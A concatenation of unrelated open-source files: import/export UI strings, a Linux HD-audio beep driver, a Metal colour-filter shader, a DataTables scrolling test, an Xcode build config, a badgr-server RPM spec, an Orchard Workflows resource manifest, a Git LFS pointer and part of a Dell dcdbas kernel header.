YouCanUseImportIdToFindRecord=You can find all the imported records in your database by filtering on field <b>import_key='%s'</b>.
NbOfLinesOK=Number of lines with no errors and no warnings: <b>%s</b>.
NbOfLinesImported=Number of lines successfully imported: <b>%s</b>.
DataComeFromNoWhere=Value to insert comes from nowhere in source file.
DataComeFromFileFieldNb=Value to insert comes from field number <b>%s</b> in source file.
DataComeFromIdFoundFromRef=Value that comes from field number <b>%s</b> of source file will be used to find the id of the parent object to use (so the object <b>%s</b> that has the ref. from source file must exist in the database).
DataComeFromIdFoundFromCodeId=Code that comes from field number <b>%s</b> of source file will be used to find the id of the parent object to use (so the code from source file must exist in the dictionary <b>%s</b>). Note that if you know the id, you can also use it in the source file instead of the code. Import should work in both cases.
DataIsInsertedInto=Data coming from source file will be inserted into the following field:
DataIDSourceIsInsertedInto=The id of the parent object, found using the data in the source file, will be inserted into the following field:
DataCodeIDSourceIsInsertedInto=The id of the parent line, found from the code, will be inserted into the following field:
SourceRequired=Data value is mandatory
SourceExample=Example of possible data value
ExampleAnyRefFoundIntoElement=Any ref found for element <b>%s</b>
ExampleAnyCodeOrIdFoundIntoDictionary=Any code (or id) found in dictionary <b>%s</b>
CSVFormatDesc=<b>Comma Separated Value</b> file format (.csv).<br>This is a text file format where fields are separated by a separator [ %s ]. If the separator is found inside a field's content, the field is enclosed by the enclosure character [ %s ]. The escape character used to escape the enclosure character is [ %s ].
Excel95FormatDesc=<b>Excel</b> file format (.xls)<br>This is the native Excel 95 format (BIFF5).
Excel2007FormatDesc=<b>Excel</b> file format (.xlsx)<br>This is the native Excel 2007 format (SpreadsheetML).
TsvFormatDesc=<b>Tab Separated Value</b> file format (.tsv)<br>This is a text file format where fields are separated by a tabulator [tab].
ExportFieldAutomaticallyAdded=Field <b>%s</b> was automatically added. It prevents similar lines from being treated as duplicate records (with this field added, each line has its own id and will differ).
CsvOptions=CSV format options
Separator=Field Separator
Enclosure=String Delimiter
SpecialCode=Special code
ExportStringFilter=%% allows replacing one or more characters in the text
ExportDateFilter=YYYY, YYYYMM, YYYYMMDD: filters by one year/month/day<br>YYYY+YYYY, YYYYMM+YYYYMM, YYYYMMDD+YYYYMMDD: filters over a range of years/months/days<br> > YYYY, > YYYYMM, > YYYYMMDD: filters on all following years/months/days<br> < YYYY, < YYYYMM, < YYYYMMDD: filters on all previous years/months/days
ExportNumericFilter=NNNNN filters by one value<br>NNNNN+NNNNN filters over a range of values<br>< NNNNN filters by lower values<br>> NNNNN filters by higher values
ImportFromLine=Import starting from line number
EndAtLineNb=End at line number
ImportFromToLine=Limit range (From - To). Eg. to omit header line(s).
SetThisValueTo2ToExcludeFirstLine=For example, set this value to 3 to exclude the first 2 lines.<br>If the header lines are NOT omitted, this will result in multiple errors in the Import Simulation.
KeepEmptyToGoToEndOfFile=Keep this field empty to process all lines to the end of the file.
SelectPrimaryColumnsForUpdateAttempt=Select column(s) to use as primary key for an UPDATE import
UpdateNotYetSupportedForThisImport=Update is not supported for this type of import (only insert)
NoUpdateAttempt=No update attempt was performed, only insert
ImportDataset_user_1=Users (employees or not) and properties
ComputedField=Computed field
## filters
SelectFilterFields=If you want to filter on some values, just input values here.
FilteredFields=Filtered fields
FilteredFieldsValues=Value for filter
FormatControlRule=Format control rule
## imports updates
KeysToUseForUpdates=Key (column) to use for <b>updating</b> existing data
NbInsert=Number of inserted lines: %s
NbUpdate=Number of updated lines: %s
MultipleRecordFoundWithTheseFilters=Multiple records have been found with these filters: %s
| {
"pile_set_name": "Github"
} |
/*
* Digital Beep Input Interface for HD-audio codec
*
* Author: Matt Ranostay <[email protected]>
* Copyright (c) 2008 Embedded Alley Solutions Inc
*
* This driver is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This driver is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
*/
#include <linux/input.h>
#include <linux/slab.h>
#include <linux/workqueue.h>
#include <linux/export.h>
#include <sound/core.h>
#include "hda_beep.h"
#include "hda_local.h"
enum {
DIGBEEP_HZ_STEP = 46875, /* 46.875 Hz */
DIGBEEP_HZ_MIN = 93750, /* 93.750 Hz */
DIGBEEP_HZ_MAX = 12000000, /* 12 KHz */
};
/* generate or stop tone */
static void generate_tone(struct hda_beep *beep, int tone)
{
struct hda_codec *codec = beep->codec;
if (tone && !beep->playing) {
snd_hda_power_up(codec);
if (beep->power_hook)
beep->power_hook(beep, true);
beep->playing = 1;
}
snd_hda_codec_write(codec, beep->nid, 0,
AC_VERB_SET_BEEP_CONTROL, tone);
if (!tone && beep->playing) {
beep->playing = 0;
if (beep->power_hook)
beep->power_hook(beep, false);
snd_hda_power_down(codec);
}
}
static void snd_hda_generate_beep(struct work_struct *work)
{
struct hda_beep *beep =
container_of(work, struct hda_beep, beep_work);
if (beep->enabled)
generate_tone(beep, beep->tone);
}
/* (non-standard) Linear beep tone calculation for IDT/STAC codecs
*
* The tone frequency of beep generator on IDT/STAC codecs is
* defined from the 8bit tone parameter, in Hz,
* freq = 48000 * (257 - tone) / 1024
* that is from 12kHz to 93.75Hz in steps of 46.875 Hz
*/
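/* Worked example (illustrative): a request of hz = 1000 is scaled to
 * 1000000 millihertz, offset and rounded against DIGBEEP_HZ_MIN and
 * DIGBEEP_HZ_STEP, then divided down to 19 steps, giving tone = 255 - 19
 * = 236, i.e. about 984 Hz, the 46.875 Hz step nearest to 1 kHz.
 */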
static int beep_linear_tone(struct hda_beep *beep, int hz)
{
if (hz <= 0)
return 0;
hz *= 1000; /* fixed point */
hz = hz - DIGBEEP_HZ_MIN
+ DIGBEEP_HZ_STEP / 2; /* round to nearest step */
if (hz < 0)
hz = 0; /* turn off PC beep*/
else if (hz >= (DIGBEEP_HZ_MAX - DIGBEEP_HZ_MIN))
hz = 1; /* max frequency */
else {
hz /= DIGBEEP_HZ_STEP;
hz = 255 - hz;
}
return hz;
}
/* HD-audio standard beep tone parameter calculation
*
* The tone frequency in Hz is calculated as
* freq = 48000 / (tone * 4)
* from 47Hz to 12kHz
*/
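/* Worked example (illustrative): hz = 1000 yields 12000 / 1000 = 12, and
 * 48000 / (12 * 4) = 1000 Hz exactly; requests below about 47 Hz saturate
 * at divider 0xff and requests above 12 kHz clamp to divider 1.
 */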
static int beep_standard_tone(struct hda_beep *beep, int hz)
{
if (hz <= 0)
return 0; /* disabled */
hz = 12000 / hz;
if (hz > 0xff)
return 0xff;
if (hz <= 0)
return 1;
return hz;
}
static int snd_hda_beep_event(struct input_dev *dev, unsigned int type,
unsigned int code, int hz)
{
struct hda_beep *beep = input_get_drvdata(dev);
switch (code) {
case SND_BELL:
if (hz)
hz = 1000;
/* fallthru */
case SND_TONE:
if (beep->linear_tone)
beep->tone = beep_linear_tone(beep, hz);
else
beep->tone = beep_standard_tone(beep, hz);
break;
default:
return -1;
}
/* schedule beep event */
schedule_work(&beep->beep_work);
return 0;
}
static void turn_off_beep(struct hda_beep *beep)
{
cancel_work_sync(&beep->beep_work);
if (beep->playing) {
/* turn off beep */
generate_tone(beep, 0);
}
}
static void snd_hda_do_detach(struct hda_beep *beep)
{
if (beep->registered)
input_unregister_device(beep->dev);
else
input_free_device(beep->dev);
beep->dev = NULL;
turn_off_beep(beep);
}
static int snd_hda_do_attach(struct hda_beep *beep)
{
struct input_dev *input_dev;
struct hda_codec *codec = beep->codec;
input_dev = input_allocate_device();
if (!input_dev)
return -ENOMEM;
/* setup digital beep device */
input_dev->name = "HDA Digital PCBeep";
input_dev->phys = beep->phys;
input_dev->id.bustype = BUS_PCI;
input_dev->dev.parent = &codec->card->card_dev;
input_dev->id.vendor = codec->core.vendor_id >> 16;
input_dev->id.product = codec->core.vendor_id & 0xffff;
input_dev->id.version = 0x01;
input_dev->evbit[0] = BIT_MASK(EV_SND);
input_dev->sndbit[0] = BIT_MASK(SND_BELL) | BIT_MASK(SND_TONE);
input_dev->event = snd_hda_beep_event;
input_set_drvdata(input_dev, beep);
beep->dev = input_dev;
return 0;
}
/**
* snd_hda_enable_beep_device - Turn on/off beep sound
* @codec: the HDA codec
* @enable: flag to turn on/off
*/
int snd_hda_enable_beep_device(struct hda_codec *codec, int enable)
{
struct hda_beep *beep = codec->beep;
if (!beep)
return 0;
enable = !!enable;
if (beep->enabled != enable) {
beep->enabled = enable;
if (!enable)
turn_off_beep(beep);
return 1;
}
return 0;
}
EXPORT_SYMBOL_GPL(snd_hda_enable_beep_device);
/**
* snd_hda_attach_beep_device - Attach a beep input device
* @codec: the HDA codec
* @nid: beep NID
*
* Attach a beep object to the given widget. If beep hint is turned off
 * explicitly or beep_mode of the codec is turned off, this does nothing.
*
* The attached beep device has to be registered via
* snd_hda_register_beep_device() and released via snd_hda_detach_beep_device()
* appropriately.
*
* Currently, only one beep device is allowed to each codec.
*/
int snd_hda_attach_beep_device(struct hda_codec *codec, int nid)
{
struct hda_beep *beep;
int err;
if (!snd_hda_get_bool_hint(codec, "beep"))
return 0; /* disabled explicitly by hints */
if (codec->beep_mode == HDA_BEEP_MODE_OFF)
return 0; /* disabled by module option */
beep = kzalloc(sizeof(*beep), GFP_KERNEL);
if (beep == NULL)
return -ENOMEM;
snprintf(beep->phys, sizeof(beep->phys),
"card%d/codec#%d/beep0", codec->card->number, codec->addr);
/* enable linear scale */
snd_hda_codec_write_cache(codec, nid, 0,
AC_VERB_SET_DIGI_CONVERT_2, 0x01);
beep->nid = nid;
beep->codec = codec;
codec->beep = beep;
INIT_WORK(&beep->beep_work, &snd_hda_generate_beep);
mutex_init(&beep->mutex);
err = snd_hda_do_attach(beep);
if (err < 0) {
kfree(beep);
codec->beep = NULL;
return err;
}
return 0;
}
EXPORT_SYMBOL_GPL(snd_hda_attach_beep_device);
/**
* snd_hda_detach_beep_device - Detach the beep device
* @codec: the HDA codec
*/
void snd_hda_detach_beep_device(struct hda_codec *codec)
{
struct hda_beep *beep = codec->beep;
if (beep) {
if (beep->dev)
snd_hda_do_detach(beep);
codec->beep = NULL;
kfree(beep);
}
}
EXPORT_SYMBOL_GPL(snd_hda_detach_beep_device);
/**
* snd_hda_register_beep_device - Register the beep device
* @codec: the HDA codec
*/
int snd_hda_register_beep_device(struct hda_codec *codec)
{
struct hda_beep *beep = codec->beep;
int err;
if (!beep || !beep->dev)
return 0;
err = input_register_device(beep->dev);
if (err < 0) {
codec_err(codec, "hda_beep: unable to register input device\n");
input_free_device(beep->dev);
codec->beep = NULL;
kfree(beep);
return err;
}
beep->registered = true;
return 0;
}
EXPORT_SYMBOL_GPL(snd_hda_register_beep_device);
static bool ctl_has_mute(struct snd_kcontrol *kcontrol)
{
struct hda_codec *codec = snd_kcontrol_chip(kcontrol);
return query_amp_caps(codec, get_amp_nid(kcontrol),
get_amp_direction(kcontrol)) & AC_AMPCAP_MUTE;
}
/* get/put callbacks for beep mute mixer switches */
/**
* snd_hda_mixer_amp_switch_get_beep - Get callback for beep controls
* @kcontrol: ctl element
* @ucontrol: pointer to get/store the data
*/
int snd_hda_mixer_amp_switch_get_beep(struct snd_kcontrol *kcontrol,
struct snd_ctl_elem_value *ucontrol)
{
struct hda_codec *codec = snd_kcontrol_chip(kcontrol);
struct hda_beep *beep = codec->beep;
if (beep && (!beep->enabled || !ctl_has_mute(kcontrol))) {
ucontrol->value.integer.value[0] =
ucontrol->value.integer.value[1] = beep->enabled;
return 0;
}
return snd_hda_mixer_amp_switch_get(kcontrol, ucontrol);
}
EXPORT_SYMBOL_GPL(snd_hda_mixer_amp_switch_get_beep);
/**
* snd_hda_mixer_amp_switch_put_beep - Put callback for beep controls
* @kcontrol: ctl element
* @ucontrol: pointer to get/store the data
*/
int snd_hda_mixer_amp_switch_put_beep(struct snd_kcontrol *kcontrol,
struct snd_ctl_elem_value *ucontrol)
{
struct hda_codec *codec = snd_kcontrol_chip(kcontrol);
struct hda_beep *beep = codec->beep;
if (beep) {
u8 chs = get_amp_channels(kcontrol);
int enable = 0;
long *valp = ucontrol->value.integer.value;
if (chs & 1) {
enable |= *valp;
valp++;
}
if (chs & 2)
enable |= *valp;
snd_hda_enable_beep_device(codec, enable);
}
if (!ctl_has_mute(kcontrol))
return 0;
return snd_hda_mixer_amp_switch_put(kcontrol, ucontrol);
}
EXPORT_SYMBOL_GPL(snd_hda_mixer_amp_switch_put_beep);
| {
"pile_set_name": "Github"
} |
//
// MTMavenVideoFilter.metal
// MetalFilters
//
// Created by alexiscn on 2018/6/8.
//
#include <metal_stdlib>
#include "MTIShaderLib.h"
#include "IFShaderLib.h"
using namespace metalpetal;
fragment float4 MTMavenVideoFragment(VertexOut vertexIn [[ stage_in ]],
texture2d<float, access::sample> inputTexture [[ texture(0) ]],
texture2d<float, access::sample> map1 [[ texture(1) ]],
texture2d<float, access::sample> map2 [[ texture(2) ]],
constant float & strength [[ buffer(0)]],
sampler textureSampler [[ sampler(0) ]])
{
constexpr sampler s(coord::normalized, address::clamp_to_edge, filter::linear);
float4 texel = inputTexture.sample(s, vertexIn.textureCoordinate);
float4 inputTexel = texel;
float3 original = texel.rgb;
// saturation boost
float luma = dot(float3(0.2126, 0.7152, 0.0722), texel.rgb);
texel.rgb = mix(texel.rgb, float3(luma), -0.17);
// contrast boost - darken shadows
texel.rgb = mix(texel.rgb, texel.rgb * float3(0.5, 0.3, 0.3), 0.8 * (1.0 - luma));
// slight boost to highlights
texel.rgb = min(mix(texel.rgb, texel.rgb * float3(1.18, 1.15, 1.1), max(0.0, luma - 0.5)), float3(1.0));
// apply curves
texel.r = map1.sample(s, float2(texel.r, 0.5)).r;
texel.g = map1.sample(s, float2(texel.g, 0.5)).g;
texel.b = map1.sample(s, float2(texel.b, 0.5)).b;
// apply curves2
texel.r = map2.sample(s, float2(texel.r, 0.5)).r;
texel.g = map2.sample(s, float2(texel.g, 0.5)).g;
texel.b = map2.sample(s, float2(texel.b, 0.5)).b;
// tone down
texel.rgb = mix(texel.rgb, original, 0.1);
texel.rgb = mix(inputTexel.rgb, texel.rgb, strength);
return texel;
}
| {
"pile_set_name": "Github"
} |
// DATA_TEMPLATE: empty_table
oTest.fnStart( "bInfiniteScroll" );
$(document).ready( function () {
var oTable = $('#example').dataTable( {
"bScrollInfinite": true,
"sScrollY": "200px",
"bServerSide": true,
"sAjaxSource": "../../../examples/server_side/scripts/server_processing.php"
} );
oTest.fnWaitTest(
"10 rows by default",
null,
function () { return $('#example tbody tr').length == 10; }
);
oTest.fnTest(
"Info",
null,
function () { return $('#example_info').html() == "Showing 1 to 10 of 57 entries"; }
);
oTest.fnTest(
"Get nodes",
null,
function () { return $('#example tbody>tr').length == 10; }
);
oTest.fnTest(
"Get nodes function",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 10; }
);
oTest.fnWaitTest(
"Scroll on 20px adds 10 rows",
function () { $('div.dataTables_scrollBody').scrollTop(20); },
function () { return $('#example tbody tr').length == 20; }
);
oTest.fnTest(
"Info after 20px scroll",
null,
function () { return $('#example_info').html() == "Showing 1 to 20 of 57 entries"; }
);
oTest.fnTest(
"Get nodes after 20px scroll",
null,
function () { return $('#example tbody>tr').length == 20; }
);
oTest.fnTest(
"Get nodes function after 20px scroll",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 20; }
);
oTest.fnWaitTest(
"Scroll on 10px more results in the same number of rows",
function () { $('div.dataTables_scrollBody').scrollTop(30); },
function () { return $('#example tbody tr').length == 20; }
);
oTest.fnTest(
"Info after 10 more px scroll",
null,
function () { return $('#example_info').html() == "Showing 1 to 20 of 57 entries"; }
);
oTest.fnWaitTest(
"Scroll to 280px adds another 10 rows",
function () { $('div.dataTables_scrollBody').scrollTop(280); },
function () { return $('#example tbody tr').length == 30; }
);
oTest.fnTest(
"Info after 240px scroll",
null,
function () { return $('#example_info').html() == "Showing 1 to 30 of 57 entries"; }
);
oTest.fnTest(
"Get nodes after 240px scroll",
null,
function () { return $('#example tbody>tr').length == 30; }
);
oTest.fnTest(
"Get nodes function after 240px scroll",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 30; }
);
oTest.fnWaitTest(
"Filtering will drop back to 10 rows",
function () { oTable.fnFilter('gec') },
function () { return $('#example tbody tr').length == 10; }
);
oTest.fnTest(
"Info after filtering",
null,
function () { return $('#example_info').html() == "Showing 1 to 10 of 20 entries (filtered from 57 total entries)"; }
);
oTest.fnTest(
"Get nodes after filtering",
null,
function () { return $('#example tbody>tr').length == 10; }
);
oTest.fnTest(
"Get nodes function after filtering",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 10; }
);
oTest.fnWaitTest(
"Scroll after filtering adds 10",
function () { $('div.dataTables_scrollBody').scrollTop(20); },
function () { return $('#example tbody tr').length == 20; }
);
oTest.fnWaitTest(
"Get nodes after filtering",
null,
function () { return $('#example tbody>tr').length == 20; }
);
oTest.fnWaitTest(
"Get nodes function after filtering",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 20; }
);
oTest.fnWaitTest(
"Sorting will drop back to 10 rows",
function () {
$('div.dataTables_scrollBody').scrollTop(0);
oTable.fnSort([[1,'asc']])
},
function () { return $('#example tbody tr').length == 10; }
);
oTest.fnWaitTest(
"Scroll after sorting adds 10",
function () { $('div.dataTables_scrollBody').scrollTop(20); },
function () { return $('#example tbody tr').length == 20; }
);
oTest.fnTest(
"Get nodes after scrolling",
null,
function () { return $('#example tbody>tr').length == 20; }
);
oTest.fnTest(
"Get nodes function after scrolling",
null,
function () { return $('#example').dataTable().fnGetNodes().length == 20; }
);
oTest.fnComplete();
} ); | {
"pile_set_name": "Github"
} |
CODE_SIGN_IDENTITY =
CONFIGURATION_BUILD_DIR = ${PODS_CONFIGURATION_BUILD_DIR}/Stencil
FRAMEWORK_SEARCH_PATHS = $(inherited) "${PODS_CONFIGURATION_BUILD_DIR}/PathKit"
GCC_PREPROCESSOR_DEFINITIONS = $(inherited) COCOAPODS=1
OTHER_SWIFT_FLAGS = $(inherited) -D COCOAPODS
PODS_BUILD_DIR = ${BUILD_DIR}
PODS_CONFIGURATION_BUILD_DIR = ${PODS_BUILD_DIR}/$(CONFIGURATION)$(EFFECTIVE_PLATFORM_NAME)
PODS_ROOT = ${SRCROOT}
PODS_TARGET_SRCROOT = ${PODS_ROOT}/Stencil
PRODUCT_BUNDLE_IDENTIFIER = org.cocoapods.${PRODUCT_NAME:rfc1034identifier}
SKIP_INSTALL = YES
| {
"pile_set_name": "Github"
} |
%define name badgr-server
%define install_dir /opt/site
%define app_user web
%define base_dir %{_builddir}/%{version}
%define _unpackaged_files_terminate_build 0
Summary: Badgr Server
Name: %{name}
Version: %{version}
Release: %{release}
Source0: ./%{name}.tar.gz
License: GNU Affero General Public License v3
Group: Development/Libraries
BuildArch: x86_64
BuildRoot: %{_tmppath}/%{name}-%{version}-%{release}-buildroot
Vendor: Concentric Sky, Inc.
BuildRequires: mysql-devel
BuildRequires: autoconf
BuildRequires: automake
BuildRequires: cyrus-sasl-devel
BuildRequires: gcc
BuildRequires: libffi-devel
BuildRequires: libjpeg-turbo
BuildRequires: libjpeg-turbo-devel
BuildRequires: libpng12
BuildRequires: libpng12-devel
BuildRequires: libtool
BuildRequires: libxslt-devel
BuildRequires: memcached-devel
BuildRequires: python2-boto
BuildRequires: python2-boto3
BuildRequires: python-devel
BuildRequires: python-pip
BuildRequires: python-virtualenv
BuildRequires: ruby
BuildRequires: ruby-devel
BuildRequires: rubygems
BuildRequires: swig
BuildRequires: zlib-devel
Requires(pre): /usr/sbin/useradd, /usr/bin/getent
Requires(postun): /usr/sbin/userdel
Requires: apr
Requires: cairo
Requires: libdbi
Requires: libpng12
Requires: libjpeg-turbo
Requires: MySQL-python
%description
Open Badge issuing and management with Django
%prep
%setup -n %{version}
%clean
%{__rm} -rf %{buildroot}
%{__rm} -rf %{install_dir}/builds/%{version}
%{__rm} -rf %{install_dir}/static/%{version}
%pre
/usr/bin/getent group %{app_user} || /usr/sbin/groupadd -r %{app_user}
/usr/bin/getent passwd %{app_user} || /usr/sbin/useradd -r -d %{install_dir} -s /bin/bash %{app_user} -g %{app_user} -k /etc/skel -m
/sbin/usermod -G %{app_user} apache
%preun
%post
%{__rm} -f %{install_dir}/code
%{__rm} -f %{install_dir}/env
%{__rm} -f %{install_dir}/staticfiles
%{__ln_s} -f %{install_dir}/builds/%{version}/code %{install_dir}/code
%{__ln_s} -f %{install_dir}/builds/%{version}/env %{install_dir}/env
%{__ln_s} -f %{install_dir}/static/%{version} %{install_dir}/staticfiles
%{__ln_s} -f %{install_dir}/etc/settings_local.py %{install_dir}/builds/%{version}/code/apps/mainsite/settings_local.py
/bin/chown %{app_user}:%{app_user} -R %{install_dir}
%postun
if [ "$1" = "1" ]; then
# If the first argument to %preun and %postun is 1, the action is an upgrade.
%{__rm} -rf %{install_dir}/builds/%{version}
%{__rm} -rf %{install_dir}/static/%{version}
elif [ "$1" = "0" ]; then
# If the first argument to %preun and %postun is 0, the action is uninstallation.
%{__rm} -rf %{install_dir}/builds/%{version}
%{__rm} -rf %{install_dir}/static/%{version}
%{__rm} -f %{install_dir}/code
%{__rm} -f %{install_dir}/env
%{__rm} -f %{install_dir}/staticfiles
fi
%build
%{__mkdir_p} %{install_dir}/builds/%{version}
# BUILD BASIC VIRTUALENV
/usr/bin/virtualenv %{install_dir}/builds/%{version}/env
# UPGRADE PIP/Virtualenv
%{install_dir}/builds/%{version}/env/bin/pip install -U pip==9.0.3
%{install_dir}/builds/%{version}/env/bin/pip install -U virtualenv==15.0.2
# INSTALL PYCURL FIRST...
export PYCURL_SSL_LIBRARY=nss
%{install_dir}/builds/%{version}/env/bin/easy_install pycurl
# INSTALL PROJECT DEPENDENCIES
%{install_dir}/builds/%{version}/env/bin/pip install -r %{base_dir}/code/requirements.txt
%{__cp} %{base_dir}/code/settings_local.py.build %{base_dir}/code/apps/mainsite/settings_local.py
# RUN ./manage.py dist
%{install_dir}/builds/%{version}/env/bin/python %{base_dir}/code/manage.py dist
# COLLECT STATIC FILES
echo "STATIC_ROOT = '%{base_dir}/static/'" >> %{base_dir}/code/settings_local.py.build
%{__cp} %{base_dir}/code/settings_local.py.build %{base_dir}/code/apps/mainsite/settings_local.py
%{install_dir}/builds/%{version}/env/bin/python %{base_dir}/code/manage.py collectstatic --noinput
%{__rm} -f %{base_dir}/code/apps/mainsite/settings_local.py
# GENERATE VERSION INFO
echo "%{version}-%{release}" > %{base_dir}/code/version.txt
echo '{"version": '"\"%{version}\""', "release": '"\"%{release}\""', "commit_sha": '"\"%{git_sha}\""', "build_date": '"\"%{build_date}\""'}' > %{base_dir}/code/buildInfo.json
%install
%{__mkdir_p} %{buildroot}%{install_dir}/builds/%{version}/code
%{__mkdir_p} %{buildroot}%{install_dir}/static/%{version}/
%{__install} -D -m 640 %{base_dir}/code/apps/mainsite/settings_local.py.example %{buildroot}%{install_dir}/etc/settings_local.py
%{__install} -D -m 640 %{base_dir}/code/wsgi.py %{buildroot}%{install_dir}/wsgi/wsgi.py
%{__cp} -Rp %{base_dir}/static/* %{buildroot}%{install_dir}/static/%{version}/
%{__cp} -Rp %{base_dir}/code/* %{buildroot}%{install_dir}/builds/%{version}/code/
%{__cp} -Rp %{install_dir}/builds/%{version}/env %{buildroot}%{install_dir}/builds/%{version}/
%files
%license %{install_dir}/builds/%{version}/code/LICENSE
%defattr(0750,%{app_user},%{app_user},0750)
%{install_dir}/wsgi/wsgi.py
%{install_dir}/builds/%{version}
%{install_dir}/static/%{version}
%config(noreplace) %attr(0644,root,root) %{install_dir}/etc/settings_local.py
%changelog
* Wed Apr 25 2018 Francisco Gray <[email protected]>
- Pinned versions of pip and virtualenv
* Thu Feb 22 2018 Francisco Gray <[email protected]>
- Removed npm install / build step
* Thu Oct 26 2017 Francisco Gray <[email protected]>
- Removed httpd and mod_wsgi from Requires
* Mon Oct 9 2017 Francisco Gray <[email protected]>
- Updated pre/preun post/postun logic to work correctly during an upgrade.
* Fri Oct 6 2017 Francisco Gray <[email protected]>
- First packaging of badgr-server
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using Orchard.Caching;
using Orchard.Environment;
using Orchard.Environment.Extensions;
using Orchard.FileSystems.VirtualPath;
using Orchard.UI.Resources;
using Orchard.Utility.Extensions;
using Orchard.Workflows.Services;
namespace Orchard.Workflows {
public class ResourceManifest : IResourceManifestProvider {
private readonly Work<IActivitiesManager> _activitiesManager;
private readonly IHostEnvironment _hostEnvironment;
private readonly IExtensionManager _extensionManager;
private readonly IVirtualPathProvider _virtualPathProvider;
private readonly ICacheManager _cacheManager;
public ResourceManifest(
Work<IActivitiesManager> activitiesManager,
IHostEnvironment hostEnvironment,
IExtensionManager extensionManager,
IVirtualPathProvider virtualPathProvider,
ICacheManager cacheManager) {
_activitiesManager = activitiesManager;
_hostEnvironment = hostEnvironment;
_extensionManager = extensionManager;
_virtualPathProvider = virtualPathProvider;
_cacheManager = cacheManager;
}
public void BuildManifests(ResourceManifestBuilder builder) {
var manifest = builder.Add();
manifest.DefineStyle("WorkflowsAdmin").SetUrl("orchard-workflows-admin.css").SetDependencies("~/Themes/TheAdmin/Styles/Site.css");
manifest.DefineScript("jsPlumb").SetUrl("jquery.jsPlumb-1.4.1-all-min.js").SetDependencies("jQueryUI");
// Trying to find a matching activity CSS for each activity in the extensions they come from.
var resourceNamesAndPaths = _cacheManager.Get("Orchard.Workflows.ActivityResourceNames", context => {
var resourceNameAndPathList = new List<Tuple<string, string>>();
foreach (var activity in _activitiesManager.Value.GetActivities()) {
var assemblyName = activity.GetType().Assembly.GetName().Name;
var extension = _extensionManager.GetExtension(assemblyName);
if (extension == null) continue;
var stylesPath = _virtualPathProvider.Combine(extension.VirtualPath, "Styles");
var resourceName = "WorkflowsActivity-" + activity.Name;
var filename = resourceName.HtmlClassify() + ".css";
var filePath = _virtualPathProvider.Combine(_hostEnvironment.MapPath(stylesPath), filename);
if (File.Exists(filePath)) {
/* Since stylesheets are shapes, we don't need to create the resource with the full path to the CSS file,
* because extensions can override those shapes by file name if they reference Orchard.Workflows,
* even when they don't exist in Orchard.Workflows. */
resourceNameAndPathList.Add(Tuple.Create(resourceName, filename));
}
}
return resourceNameAndPathList;
});
foreach (var resourceNameAndPath in resourceNamesAndPaths) {
manifest
.DefineStyle(resourceNameAndPath.Item1)
.SetUrl(resourceNameAndPath.Item2)
.SetDependencies("WorkflowsAdmin");
}
manifest
.DefineStyle("WorkflowsActivities")
.SetDependencies(resourceNamesAndPaths.Select(resourceNameAndPath => resourceNameAndPath.Item1).ToArray());
}
}
}
| {
"pile_set_name": "Github"
} |
version https://git-lfs.github.com/spec/v1
oid sha256:2d8f43cee31f268e5c1828308b3994bdbb3e57fe02297bca6623d6ed5e9d57c6
size 7422656
| {
"pile_set_name": "Github"
} |
// Copyright (c) Microsoft. All Rights Reserved. Licensed under the Apache License, Version 2.0. See License.txt in the project root for license information.
using Microsoft.CodeAnalysis.Options;
namespace ShaderTools.CodeAnalysis.Navigation
{
internal static class NavigationOptions
{
/// <summary>
/// This option can be passed to the <see cref="IDocumentNavigationService"/> APIs to request that a provisional (or preview) tab
/// be used for any document that needs to be opened, if one is available.
/// </summary>
public static readonly Option<bool> PreferProvisionalTab = new Option<bool>(nameof(NavigationOptions), nameof(PreferProvisionalTab), defaultValue: false);
}
}
| {
"pile_set_name": "Github"
} |
/* SPDX-License-Identifier: GPL-2.0-only */
/*
* dcdbas.h: Definitions for Dell Systems Management Base driver
*
* Copyright (C) 1995-2005 Dell Inc.
*/
#ifndef _DCDBAS_H_
#define _DCDBAS_H_
#include <linux/device.h>
#include <linux/sysfs.h>
#include <linux/types.h>
#define MAX_SMI_DATA_BUF_SIZE (256 * 1024)
#define HC_ACTION_NONE (0)
#define HC_ACTION_HOST_CONTROL_POWEROFF BIT(1)
#define HC_ACTION_HOST_CONTROL_POWERCYCLE BIT(2)
#define HC_SMITYPE_NONE (0)
#define HC_SMITYPE_TYPE1 (1)
#define HC_SMITYPE_TYPE2 (2)
#define HC_SMITYPE_TYPE3 (3)
#define ESM_APM_CMD (0x0A0)
#define ESM_APM_POWER_CYCLE (0x10)
#define ESM_STATUS_CMD_UNSUCCESSFUL (-1)
#define CMOS_BASE_PORT (0x070)
#define CMOS_PAGE1_INDEX_PORT (0)
#define CMOS_PAGE1_DATA_PORT (1)
#define CMOS_PAGE2_INDEX_PORT_PIIX4 (2)
#define CMOS_PAGE2_DATA_PORT_PIIX4 (3)
#define PE1400_APM_CONTROL_PORT (0x0B0)
#define PCAT_APM_CONTROL_PORT (0x0B2)
#define PCAT_APM_STATUS_PORT (0x0B3)
#define PE1300_CMOS_CMD_STRUCT_PTR (0x38)
#define PE1400_CMOS_CMD_STRUCT_PTR (0x70)
#define MAX_SYSMGMT_SHORTCMD_PARMBUF_LEN (14)
#define MAX_SYSMGMT_LONGCMD_SGENTRY_NUM (16)
#define TIMEOUT_USEC_SHORT_SEMA_BLOCKING (10000)
#define EXPIRED_TIMER (0)
#define SMI_CMD_MAGIC (0x534D4931)
#define SMM_EPS_SIG "$SCB"
#define DCDBAS_DEV_ATTR_RW(_name) \
DEVICE_ATTR(_name,0600,_name##_show,_name##_store);
#define DCDBAS_DEV_ATTR_RO(_name) \
DEVICE_ATTR(_name,0400,_name##_show,NULL);
#define DCDBAS_DEV_ATTR_WO(_name) \
DEVICE_ATTR(_name,0200,NULL,_name##_store);
#define DCDBAS_BIN_ATTR_RW(_name) \
struct bin_attribute bin_attr_##_name = { \
